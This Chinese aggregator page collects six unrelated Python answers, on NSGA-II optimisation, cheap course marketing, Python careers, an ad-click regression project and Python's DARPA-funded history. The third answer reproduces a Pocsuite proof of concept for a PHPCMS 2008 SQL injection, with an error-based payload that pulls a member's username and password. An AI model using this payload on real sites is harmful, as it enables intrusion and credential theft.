‘壹’ 学习多目标优化需要掌握哪些python知识
多目标优化
目标优化问题一般地就是指通过一定的优化算法获得目标函数的最优化解。当优化的目标函数为一个时称之为单目标优化(Single-
objective Optimization Problem,
SOP)。当优化的目标函数有两个或两个以上时称为多目标优化(Multi-objective Optimization Problem,
MOP)。不同于单目标优化的解为有限解,多目标优化的解通常是一组均衡解。
多目标优化算法归结起来有传统优化算法和智能优化算法两大类。
1. 传统优化算法包括加权法、约束法和线性规划法等,实质上就是将多目标函数转化为单目标函数,通过采用单目标优化的方法达到对多目标函数的求解。
2. 智能优化算法包括进化算法(Evolutionary Algorithm, 简称EA)、粒子群算法(Particle Swarm Optimization, PSO)等。
Pareto最优解:
若x*∈C*,且在C中不存在比x更优越的解x,则称x*是多目标最优化模型式的Pareto最优解,又称为有效解。
一般来说,多目标优化问题并不存在一个最优解,所有可能的解都称为非劣解,也称为Pareto解。传统优化技术一般每次能得到Pareo解集中的一个,而
用智能算法来求解,可以得到更多的Pareto解,这些解构成了一个最优解集,称为Pareto最优解。它是由那些任一个目标函数值的提高都必须以牺牲其
他目标函数值为代价的解组成的集合,称为Pareto最优域,简称Pareto集。
Pareto有效(最优)解非劣解集是指由这样一些解组成的集合:与集合之外的任何解相比它们至少有一个目标函数比集合之外的解好。
求解多目标优化问题最有名的就是NSGA-II了,是多目标遗传算法,但其对解的选择过程可以用在其他优化算法上,例如粒子群,蜂群等等。这里简单介绍一下NSGA-II的选择算法。主要包含三个部分:
1. 快速非支配排序
要先讲一下支配的概念,对于解X1和X2,如果X1对应的所有目标函数都不比X2大(最小问题),且存在一个目标值比X2小,则X2被X1支配。
快速非支配排序是一个循环分级过程:首先找出群体中的非支配解集,记为第一非支配层,irank=1(irank是个体i的非支配值),将其从群体中除去,继续寻找群体中的非支配解集,然后irank=2。
2. 个体拥挤距离
为了使计算结果在目标空间比较均匀的分布,维持种群多样性,对每个个体计算拥挤距离,选择拥挤距离大的个体,拥挤距离的定义为:
L[i]d=L[i]d+(L[i+1]m−L[i−1]m)/(fmaxm−fminm)
L[i+1]m是第i+1个个体的第m目标函数值,fmaxm 和 fminm是集合中第m个目标函数的最大和最小值。
3. 精英策略选择
精英策略就是保留父代中的优良个体直接进入子代,防止获得的Pareto最优解丢失。将第t次产生的子代种群和父代种群合并,然后对合并后的新种群进行非支配排序,然后按照非支配顺序添加到规模为N的种群中作为新的父代。
‘贰’ 抖音上比较火的python学习,真的可以达到广告所说的水平嘛
几块钱就能学会编程?都是套路。8.9元Python小课掀起编程热,网友:试学后又花了4位数报班。
低价和刷量,是Python小课割韭菜的利器。销售的力量不就是这样吗,我卖python课,就得包装成google,facebook都特别重视,学会了就走上人生巅峰,迎娶白富美。
现实则是:学个helloworld挺容易,但是用python跑人工智能,就算照着教程,内行也不一定能跑下来,9.9的课程,估计一半都是讲怎么安装环境,另一半一边介绍基本知识,一边做个helloworld。后续如何就得看你个人造化了,师傅领进门,修行在个人。不是不教,只是9.9是不够的。
总结:想要学习python的核心技术,并且想要从事it行业,还是需要进行一些系统的学习,不可能通过一个质量都无法保障的网课,就可以学会目前一个比较热门的技术。
‘叁’ 如何使用python编写poc,exp
然后来谈谈自己的看法:
其实吧,无论乌云的Tangscan也好,知道创宇的Pocsuite也好,还有Beebeeto也好(Bugscan没写过,不是特别了解不过应该差不多),关于Web的Poc和Exp,都极度依赖于两个Python库。
1. Requests : 模拟Web的请求和响应等交互动作。
2. Re : 正则表达式,用来验证返回的结果是否符合漏洞的预期,从而验证漏洞是否存在。
其余的大部分代码都是漏洞的信息。
Pocsuite官方文档例子:
#!/usr/bin/env python
# coding: utf-8
import re
import urlparse
from t import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class TestPOC(POCBase):
vulID = '62274' # ssvid
version = '1'
author = ['Medici.Yan']
vulDate = '2011-11-21'
createDate = '2015-09-23'
updateDate = '2015-09-23'
references = ['']
name = '_62274_phpcms_2008_place_sql_inj_PoC'
appPowerLink = ''
appName = 'PHPCMS'
appVersion = '2008'
vulType = 'SQL Injection'
desc = '''
phpcms 2008 中广告模块,存在参数过滤不严,
导致了sql注入漏洞,如果对方服务器开启了错误显示,可直接利用,
如果关闭了错误显示,可以采用基于时间和错误的盲注
'''
samples = ['']
def _attack(self):
result = {}
vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schema.tables group by a)b), '0')#"
head = {
'Referer': payload
}
resp = req.get(vulurl, headers=head)
if resp.status_code == 200:
match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key', resp.content, re.I | re.M)
if match_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = match_result.group(1)
result['AdminInfo']['Password'] = match_result.group(2)
return self.parse_attack(result)
def _verify(self):
result = {}
vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#"
head = {
'Referer': payload
}
resp = req.get(vulurl, headers=head)
if resp.status_code == 200 and '' in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vulurl
result['VerifyInfo']['Payload'] = payload
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
可以看到从代码11到28行都是漏洞的一些信息,真正的功能函数只有_attack和_verify两个而已。甚至这个例子有点繁琐了,现在大大们都是把exploit写在verify里面,所以真正起到功能的,也就不到十行的代码。pocsuite.net 这个库其实就是Requests。用Requests模拟手工注入的Post提交,用正则匹配提取和验证必要信息,简单说起来就是这两个步骤。
这么一来你再看看其他的由Python写的Poc和Exp就大同小异了。Poc/Exp总的说来就只是用程序代替手工的过程而已,所以了解了漏洞的原理和认证方法之后就简单了。
代码很简单最主要的,还是对于漏洞的理解。
先说到这里,有空之后再写一些别的。
‘肆’ Python作为一门编程语言,学完了python能做什么工作
Python是一种高级编程语言,因为有很多包,你可以快速开始,很多公司都在使用。在学习Python之后,可能适合的职业主要集中在以下几个方面:
产品管理器通常需要准备PPT报告各种数据,并且Python数据分析师也可以使用Python很多工作。如今,数据分析师基本上没有说Python,因为Python内部数据分析太多,熊猫,Numpy,Scikit学习,Matplotlib,Tensorflow .许多数据科学家也在使用Python,所以如果数据分析,那么有兴趣学习,还可以考虑网络的方向探索Python培训。这也很明显。现在对Python的需求如此之高,很多人已经开始学习Python,总是被教导,教育培训也是一个持久的行业。至少有一些编程基础在Python之后,然后学习一些新兴语言,触摸旁路,并正确做训练。财务顾问现在处于数字转型,金融方向本身是一堆数据。这是大量数据。它是很多手工工作,付款和责任,现在,自动化得到改善,对于财务人员的要求也很高,如果你可以在这些数据的基础上进行一些分析,它也是非常繁荣的做一个好主意,它非常受欢迎。
‘伍’ 淘宝广告用户点击预测(python)
为提高用户淘宝广告点击率,通过分析淘宝用户广告点击记录及对应的用户信息和广告信息表,用python 进行数据合并后进行数据清洗、提取数据特征,做特征工程分析,分析影响用户点击广告的因素,建立简单逻辑回归模型,预测用户是否点击广告;
https://tianchi.aliyun.com/dataset/dataDetail?dataId=56
数据集简介(详情见数据集链接):
数据集一共4个表,因为是广告点击预测,就用了前面三个表,表描述如下:
主表:raw_sample
以clk 作为后逻辑回归模型数据集标签,后面会改名称为flag;
数据清洗:
以user id+ time_stamp查看,会有很多重复的记录。删除重复时间+用户ID,设置唯一标识;
查看目前数据集大小:
查看空值:
查看点击占比:
ad_feature
数据清洗:
查看重复值:
和主表做关联生成date1:
查看合并后的空值:
查看点击占比:
user_profile
查看重复值:
和date1做关联生成date2:
最终数据表信息:
查看点击比例:
删除不需要做分析的ID标识符字段:
最终数据表点击比例:
类别字段:男女占比/学生占比
时间字段:
数据集只有时间戳字段,我们从中提取星期数以及对应时间段来看时间趋势;
查看点击趋势:
对星期数再区分以便后面做特征提取;
同样对小时进行分组方便后面的特征处理
连续型字段处理:
price:
查看广告价格描述性统计信息:
给广告价格分区:
时间字段可以删除:
查看目前缺失数据,需要填充缺失数据:
查看缺失占比,pvalue_level缺失的比较多,用一个特殊的数字填充,这里用的9999.0
空值填充:如果是数值类型,用平均值取代;如果是分类数据,用最常见的类别取代;
查看剩余连续数据的分布和描述性统计信息:
删除分完区的原始列:
把sex标准化变成0/1:
目前数据预览:
Age_leavel/wechat_group 分类太多,后面做特征编码的时候生成的特征太多,对它进行分区:
数据集重命名备份:
对前面提取的特征用使用get_mmies进行one-hot编码(类似的做法,就贴三个)
分类列stu我们编码后保留一个特征:
相关系数法:计算各个特征的相关系数
查看各个特征与点击情况(flag)的相关系数,ascending=False表示按降序排列:
截取了相关系数前后几个,都不高,用户本身广告点击率就很低;
广告价格、资源位、性别、商品类别、周五比较能影响用户点击;
根据各个特征与flag的相关系数大小,选择了这几个特征作为模型的输入:
建立训练数据集和测试数据集:
建立逻辑回归并计算逻辑正确率:
‘陆’ python背后是一项科技运动
比较官方的说法,python是一种解释型语言,解释型语言是指代码一行一行的解释执行,就好像有个 同声传译 ,你每说一句话,他都能不间断地给你翻译,把你说的话(意指写好的代码)翻译成机器能够理解的语言。对于机器来说,这些翻译后的语言就是机器语言,就是指令,机器收到指令后,就会根据指令执行对应的操作。
与解释型语言相对的,有编译型语言,编译型语言则通过编译器先将代码翻译成机器语言,再交给机器去执行。举个例子,我方主持了一个会议,参会的分别有英国人、俄国人和西班牙人,他们三方都带了自己的同声传译。假如是解释型语言呢,我在开会的时候用一种每个同声传译都听得懂的的语言,也就是一种官方用语。这样我可以不间断地用这种语言来做交流,因为这些翻译人员都会为这三国参会人员同步翻译成目标语言,你应该也注意到了,解释型语言类似于一种通用的语言。而如果是编译型语言呢,我会让我这边的3个翻译人员将我的一份中文演讲稿,分别翻译成英文版的、俄文版的和西班牙语版的,在开会的时候,我只要交给参会的国际友人去翻阅就好了。解释型语言侧重的是一种通用的、能够实时解释翻译的特性,而编译型语言侧重的是有针对性、提前准备的特性。然而,在开会的时候,解释型效率是没有那么高的,因为需要同声传译消耗时间去做翻译,而编译型的效率会高些,因为翻译工作已经在开会前做好了,只需要参会人员理解并且执行就好。
1989年的圣诞节,荷兰程序员Guido van Rossum( 吉多·范罗苏姆 ,以下简称吉多)在家休假无聊,为了打发时间,他开发了一种新的解释型语言。可见,该程序员无聊的时候,就是写代码。因为作者非常喜欢 Monty Python's Flying Circus (巨蟒剧团之飞翔的马戏团,这是英国的一个电视喜剧),就拿python作为这个新语言的名字。我想大家不一定都知道这部喜剧,但是可能都听说过python,可能微信在几天前给你推过python相关的培训广告,可能一些学校已经将掌握python基础概念作为一门选修课,可能你的智能家居里的操作系统有一部分核心代码是用python实现的,可能你的手机里有一个插件也是用python实现的,python现在的应用范围非常广泛,功能也非常强大。
吉多之前在 荷兰数学和计算机科学研究学会 上班,在那里,他为ABC编程语言工作了好多年。 ABC语言长这样的
这是一个函数,你也许看不懂,根据英文单词,或许可以大概猜出点什么。这里只想让你知道,python也差不多长这样,相比较会更容易理解些。
ABC虽然是一门编程语言,它的定位是作为教学或原型设计的工具,是专门为学校老师或者科研人员设计的。ABC的定位决定了它受众不是很广泛,并且它也有使用门槛,对计算机不了解的人,没有经过一段时间的学习,可能根本就上不了手。所以,ABC并不能作为一门通用的编程语言,在业内也无法获得成功。虽然说ABC没有python那么成功,但是ABC可以说是"the mother of python",作者在很多地方都借鉴了ABC,取其精华、取其糟粕。现如今,python是长这样的
可能对于没接触过编程的人来说,它们两不都是一样的,不都是一堆英文字母么,我都看不懂。但是对于初学计算机课程,那些需要学习C语言的人来说,python相比较算是更容易理解了。python非常简短,一些复杂的流程,在C语言中,可能需要几十行代码,但是在python中,可能就只需要几行代码。当然不同的业务场景,可能不是这样的,但是普遍情况下,用python的开发效率是非常高的。python适合快速开发,适合产品快速迭代出新。
1999年1月,也就是语言面世的10年后, 吉多 向DARPA(Defense Advanced Research Projects Agency,美国国防部一个负责科研的下属机构)申请资金。我去翻了下该申请的修订版,修订版在1999年8月份提交,修订版比第一版内容更具有概括性,并且内容翔实,条理清晰,值得翻阅。
该修订版叫 Computer Programming for Everybody ,直译过来,就是针对每个人的计算机编程,翻译为通俗易懂的词——人人编程,人人编程是一种 社会 现象,每个人都有一定的编程能力,并且对计算机有一定的认识,了解软硬件是怎么运转起来的,了解一些软硬件的设计规范,能够通过编程来表达自己的想法,能够通过编程来配置自己的软件,通过编程来控制自己的机器,以改善自己的生活。举个例子,你在某宝买了一个扫地机器人,该机器人支持定义打扫路线,支持设置扫地机器人在需要更换扫把的时候,指示灯显示指定的颜色。你知道扫地机器人可以做什么,有什么操作习惯,这是基于你对一些机器的理解,如果你用过很多软件,或者参与过软件的设计,你大概都知道一些软件可能都有“设置”、“编辑”或“帮助”等菜单键。这种设计思维,或者操作习惯,都是很多软件都有的,有了这种认识之后,你面对很多同类型的软件、或者同类型的产品,就大概能够知道从那里入手,以及对它有什么功能,都有一个初步的期待或者认识。既然大家都了解计算机了,那么计算机的一些概念或者说是理念,可以说是属于常识的一部分,面对一些计算机或者说智能设备,也大概知道从哪里上手使用。我觉得这就是作者要达到的愿景。
该修订版主要有几个目的:
在这里,他想从推广python开始,因为python作为一门适合快速开发的工具,既适合专家,也适合初学者,同时python有一个活跃的且不断增长的用户群体,这个用户群体对他这个申请也非常感兴趣,愿意为之努力。python的用户数多,说明已经在市场得到了一定的认可,并且这个用户群体也愿意为python的发展做贡献,这对于一门编程语言来说,最好不过了。
该提案的 基本论点 部分写得很好,他说他想普及计算机应用,但并非通过介绍新的硬件,或者新软件这种形式,而是通过赋予每个人编程能力来实现。信息技术的发展给了人们各种强大的计算机,它们以桌面电脑、笔记本电脑或者嵌入式系统的形式存在,如果用户在软件设计和实现上有一个通用的认知,那将会极大地促进生产和创造,并且对未来有深远的影响。试想一下,如果你有一种修改和配置软件的能力,并且你可以把你的修改通过社区网站分享其他人,其他人碰到同样的问题的话,就可以参照你的方法。这种能力在紧急的情况下是很重要的,你不必等专家来给你解决问题,你自己就可以尝试解决这些问题。说到这里,你有没有想起贴吧,或者论坛,论坛有很多个板块,不同的领域分不同的板块,假如你想root手机(手机越狱,指解除手机厂商的限制,获取手机的用户最高权限,以实现对手机的某种控制),你可以到论坛上root板块找答案,这种形式可谓跟吉多提到的是一样的。如果你对你的手机或者电脑有更深入的了解,你可以通过编程改善你的输入法,或者改变你的显示器冷暖色等等,这些都是对你生活有帮助的。吉多在这里就是想达到这种状态,简单点说,人人都对计算机有一定的了解,且都有处理计算机问题的能力。
为了实现这个目标,作者制定了5年计划,这个5年计划如下:
5年计划循序渐进,由浅入深。1999年3月,美国国防部对此进行了回应,同意拨款给他。作者的5年计划在1999年底开始实施,虽然想推进5年,但是只收到1年的资金支持。不过,作者还是没有放弃这个项目,一直推进,直到他不再参与python的工作。当时美国国防部对他们提供了多少资金呢,我没看到官方公开的数据。2013年有报道称,DARPA向Continuum Analytics提供3百万美元的支持,让该公司给python开发数据处理以及数据可视化工具。具体数字是否可靠,这个尚不清楚,但管中窥豹,可见美国国防部对该项目表示认可,并提供了资金支持。Continuum Analytics有一个比较有名的工具,叫Anaconda,Anaconda可以理解为是python + 各种科学计算库的工具箱,Anaconda官网有这么一句话
翻译为“Continuum Analytics的Anaconda是使用python的、领先的开源科学计算平台,我们赋予那些正在改变世界的人超能力。”
在查资料的时候,我发现了一个wiki论坛, 该论坛对该项目进行了评价,论坛列出了该项目成功的地方和失败的地方,以及一些 社会 人士的看法。论坛这样总结道,这个项目成功的地方在于:
这个项目失败的地方在于:
回想自己初学python的时候,我觉得这个总结是很公正的。python确实容易入门,有编程基础的人可能只需要一个星期就能掌握python的一些基本语法。相比C语言,python对于初学者是很友好的,很容易让人上手。但是,要深入理解python,并没有这么简单,需要花很多时间去磨练。接手一个使用python的项目,你需要花一些时间精力去熟悉,去摸透里面的逻辑,这对于初学者来说,是无法避免的。 对于一个程序员来说,作者能想象到以后计算机的普及应用,以及用户的认知水平,还有他能够做什么,通过什么来实现,能有这些远大的抱负,这是非常不容易的。西方世界经常说到“change the world,make the world a better place”,作者也确实做到了,他设计的python在计算机世界里扮演者一个非常重要的角色。如果通过 科技 能够改变世界,那么python就是改变世界的其中一步。1980-2000年,美国对 科技 公司是政策扶持、技术扩散,这期间涌现了如IBM、HP、思科等 科技 公司,大家熟知的微软和苹果都是在这期间上市的。python可以说是这个 科技 运动的一个缩影,在 科技 浪潮的推动下,python得到了长足的发展。
很多 科技 或工业相关的网站会根据当年编程语言的流行度做下排名,它们会列出当年在业界最受欢迎的编程语言。其中,IEEE Spectrum 和 TIOBE 的2021年度编程语言是python,如果我还没记错的话,TIOBE的2020年度编程语言也是python。可见python是非常受欢迎的,用现在的话讲,就是“网红”编程语言。现在,很多计算设备上都有python的身影,小到智能家居、手机、智能手表,大到锂电车、工控车床、甚至航天飞机都有python的身影。你可能在浏览网页的时候,右下角弹出一个“7天python入门”的广告,可见python现在还是有很多需求,因为有需求,所以才有人去投广告,才会有人去找培训机构。
作者在给美国国防部的提案中写到,他想跟高中或大学展开合作,设计一些python的课程,针对不同年级,设计不同水平的课程。现在来看,他确实是做到了,现在哈佛、密歇根大学等排名靠前的大学,都有python课程,python在这些大学的CS(计算机科学)课程中应用非常广泛,可以说是作为CS导论的一个教学工具。在一些比较高级的课程,比如数据科学、人工智能等都可以看到python的身影,这是因为学术界以及工业界为python提供了一些处理科学计算和大数据的工具,这也归功于美国国防部的支持。美国有许多编程夏令营,针对不同年龄段有不同的课程,并且也有许多支持python代码的编程竞赛。Google在coursera上有一个面向初学者的课程,该课程叫 Google IT Automation with Python,完成课程大约需要 8 个月,课程建议每周花5小时学习,课程结束后就可以获得Google颁发的证书。可见,不管是工业界,还是教育界,都对python有不同程度的支持。这里打个岔,第一版的Google搜索引擎还是用python写的,作者也在Google工作了一段时间。
现如今,每隔一段时间,就有一个PyCon活动,这个活动汇聚世界各地的开发者,每年都有开发者来展示他们使用python的成功案例,或者表达自己对python的新功能或者缺陷的看法。可见,python用户社区一直都是很活跃的。这让我想到了某新能源 汽车 ,该 汽车 用户有很高的粘性,有一位车主跟我说过,他们有一个微信群,里面有该新能源 汽车 的高管,很多车主乐意在里面指出问题,或者提建议,因为这些高管会对问题或者建议做出相应的反馈。用户愿意提意见,产品经理愿意广开言路,采纳多方建议,实属不易。python社区也差不多如此。
几年前,你是否看过一个新闻,《人工智能“网红”编程语言Python进入山东小学课本》,这是2017年澎湃网的一则新闻,里面讲了python进入了山东省小学六年级教材,作为一门“网红”编程语言,它是否适合低龄学生,这个倒是没细说,但是可见国内有些地方是把编程作为一种比较基础的能力来考量。python往低龄阶段渗透是否合适呢,我在翻资料的时候瞥到韩国高丽大学的一篇论文,论文讲述小学生在学习python的过程中会碰到一些困难,比如经常少打了一些括号,经常拼错单词,经常碰到语法错误,以及对这些现象的看法。还有,南京师范大学有一篇报道,讲述了中学生学习在学习python时,采用面向问题的学习模式,我理解是case by case的教学模式,这种模式有利于学生培养学生的计算机思维,以及帮助他们理解一些计算机相关的概念,解决计算机相关的问题。
python是否适合低龄学生呢,我觉得这个是值得讨论的话题。最后还要问你一句,你会让你的小孩学习python么,从什么时候开始学呢?你的娃因为不知道打多少个括号嚎啕大哭时,你能帮得上忙么?你到时候需要专门请一个程序员来给你的娃做家教么?
https://zh.wikipedia.org/wiki/Python%E8%BB%9F%E9%AB%94%E5%9F%BA%E9%87%91%E6%9C%83
https://www.python.org/psf/
https://www.computerworld.com/article/2711690/python-gets-a-big-data-boost-from-darpa.html
https://legacy.python.org/doc/essays/omg-darpa-mcc-position/
https://legacy.python.org/doc/essays/blurb/
https://www.python.org/doc/essays/cp4e/
http://wiki.c2.com/?
https://koreauniv.pure.elsevier.com/en/publications/an-analysis-of-the-difficulties-of-elementary-school-students-in-
https://www.frontiersin.org/articles/10.3389/fpsyg.2021.771221/full
https://zh.wikipedia.org/wiki/%E7%BB%88%E8%BA%AB%E4%BB%81%E6%85%88%E7%8B%AC%E8%A3%81%E8%80%85
https://gvanrossum.github.io//
http://neopythonic.blogspot.com/2016/04/kings-day-speech.html
https://www.artima.com/intv/guido.html
https://www.htsec.com/jfimg/colimg/upload/20200113/68981578882847978.pdf